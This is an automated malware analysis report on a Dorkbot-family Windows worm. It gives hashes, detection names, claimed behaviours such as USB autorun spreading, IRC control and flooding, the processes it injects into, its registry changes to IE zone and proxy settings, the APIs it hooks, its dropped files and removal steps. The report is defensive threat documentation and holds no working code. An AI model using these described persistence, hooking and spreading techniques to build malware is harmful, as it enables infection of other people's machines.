Trojan.Win32.VBKrypt.unsf (Kaspersky), Trojan.GenericKD.1593098 (B) (Emsisoft), Trojan.GenericKD.1593098 (AdAware), Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)Behaviour: Banker, Trojan, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 407a7b5eae7286859b445a4f21a126a6
SHA1: 59de4956229156bd0f9df2b6e379db04ebf1676e
SHA256: 6a9735df90ec7bf48c8c2bbe94325a18db0abe7aa9e952f567b11f1b053ea9f5
SSDeep: 3072:He/IDF9s7K21jmSMiaWbeMt2CxkDx9vcLaL3l:He/SF9s7ZTMIbeMt2PDx9vZDl
Size: 160368 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualBasicv50v60
Company: Firseria
Created at: 2012-07-12 18:55:20
Analyzed on: WindowsXP SP3 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
MSNWorm | A worm can spread its copies through the MSN Messanger. |
DNSBlocker | A program can block designated DNS servers for making it difficult for users to locate specific domains or web sites on the Internet. |
UDPFlooder | This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host. |
SYNFlooder | This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. |
Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
USBInfector | A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer. |
Process activity
The Worm creates the following process(es):
2.exe:1612
%original file name%.exe:404
%original file name%.exe:772
The Worm injects its code into the following process(es):
wuauclt.exe:1792
2.exe:1240
spoolsv.exe:1436
vmacthlp.exe:924
csrss.exe:688
winlogon.exe:712
services.exe:756
Explorer.EXE:888
svchost.exe:936
svchost.exe:1020
svchost.exe:1104
svchost.exe:1164
svchost.exe:1244
wmiprvse.exe:1352
jqs.exe:1592
File activity
The process 2.exe:1240 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[2].txt (3941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Poemas[1].htm (50506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_13[1].gif (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CSS.Sitio[1].css (10973 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ii_13[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\facebook[1].png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_84[1].gif (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\560[1].png (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\st[1] (4627 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_82[1].gif (354 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vineta[1].gif (87 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2454[1].htm (1596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_02[1].gif (3521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\twitter[1].png (608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\videos_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i-2i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\568[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i.f06[1].gif (277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[1].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[4].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Principal[1].js (5401 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[2].html?s=300x250&M=5&r=0 (711 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_86[1].gif (355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[1] (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA4TMZWD.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[1].js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Latinoamericanas[1].htm (36234 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[2].txt (338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_58[1].gif (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_28[1].gif (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_26[1].gif (573 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\567[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\e_17[1].gif (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\c83b510be812cec3ea3446015eb76621[1].gif (4984 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[1].txt (5605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Funciones[1].js (3449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\fa1b6b9794e5b240bbad703d9f4c9a12[1].png (4434 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\swfobject[1].js (6753 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA416Z8D.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\f[1].gif (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\-4524f[1].gif (110 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\fondo_icos[1].gif (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i-21[1].gif (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lyrics_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\st[1] (2871 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[1].txt (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c5f8760e7af5ff75c20de7295e421a6f[1].png (1529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_08[1].gif (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[2].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i-play[1].gif (393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\syij4[1].gif (351 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\esmusicon[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOP2XPQ.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\imp[1].html?s=300x250&M=5&r=0 (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[2] (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[3].html (382 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (26028 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[2].txt (5030 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\esmusicon[1].htm (50961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CSS.Panel[1].css (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\principal[1].swf (16315 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[2].js (1677 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[1].txt (3755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ii_14[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\mi.2papa[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i.b07[1].gif (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_15[1].gif (156 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA416Z8D.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\imp[1].html?s=300x250&M=5&r=0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[2].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\imp[1].html?s=300x250&M=5&r=0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[3].html (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2454[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOP2XPQ.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\esmusicon[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA4TMZWD.gif (0 bytes)
Registry activity
The process 2.exe:1240 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "2.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "16708456"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 98 7C 23 29 F8 DC 07 A4 10 E6 54 0A 97 77 40"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 2.exe:1612 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 AC 10 22 2A 81 8C F2 12 F6 6B BA 5B 79 0F EA"
The process %original file name%.exe:404 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 67 77 ED 66 3B 5C D6 08 5F F1 57 45 42 B2 FA"
The process %original file name%.exe:772 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 83 1C E6 F9 A8 ED B7 4E A7 47 02 40 32 B0 F3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
Dropped PE files
MD5 | File path |
---|---|
d94da84045124ec63a2790ba9a89f807 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\1.tmp |
635e78b303136a15a6a8ea03b857e4c1 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\2.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Worm installs the following user-mode hooks in WININET.dll:
HttpSendRequestW
InternetWriteFile
HttpSendRequestA
The Worm installs the following user-mode hooks in DNSAPI.dll:
DnsQuery_A
DnsQuery_W
The Worm installs the following user-mode hooks in WS2_32.dll:
send
GetAddrInfoW
The Worm installs the following user-mode hooks in kernel32.dll:
MoveFileA
CopyFileW
CopyFileA
MoveFileW
CreateFileW
CreateFileA
The Worm installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.A worm can spread its copies through the MSN Messanger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
2.exe:1612
%original file name%.exe:404
%original file name%.exe:772 - Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[2].txt (3941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Poemas[1].htm (50506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_13[1].gif (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CSS.Sitio[1].css (10973 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ii_13[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\facebook[1].png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_84[1].gif (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\560[1].png (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\st[1] (4627 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_82[1].gif (354 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vineta[1].gif (87 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2454[1].htm (1596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_02[1].gif (3521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\twitter[1].png (608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\videos_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i-2i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\568[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i.f06[1].gif (277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[1].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[4].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Principal[1].js (5401 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[2].html?s=300x250&M=5&r=0 (711 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_86[1].gif (355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[1] (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA4TMZWD.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[1].js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Latinoamericanas[1].htm (36234 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[2].txt (338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_58[1].gif (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_28[1].gif (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_26[1].gif (573 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\567[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\e_17[1].gif (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\c83b510be812cec3ea3446015eb76621[1].gif (4984 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[1].txt (5605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Funciones[1].js (3449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\fa1b6b9794e5b240bbad703d9f4c9a12[1].png (4434 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\swfobject[1].js (6753 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA416Z8D.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\f[1].gif (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\-4524f[1].gif (110 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\fondo_icos[1].gif (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i-21[1].gif (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lyrics_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\st[1] (2871 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[1].txt (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c5f8760e7af5ff75c20de7295e421a6f[1].png (1529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_08[1].gif (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[2].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i-play[1].gif (393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\syij4[1].gif (351 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\esmusicon[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOP2XPQ.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\imp[1].html?s=300x250&M=5&r=0 (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[2] (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[3].html (382 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (26028 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[2].txt (5030 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\esmusicon[1].htm (50961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CSS.Panel[1].css (735 bytes)
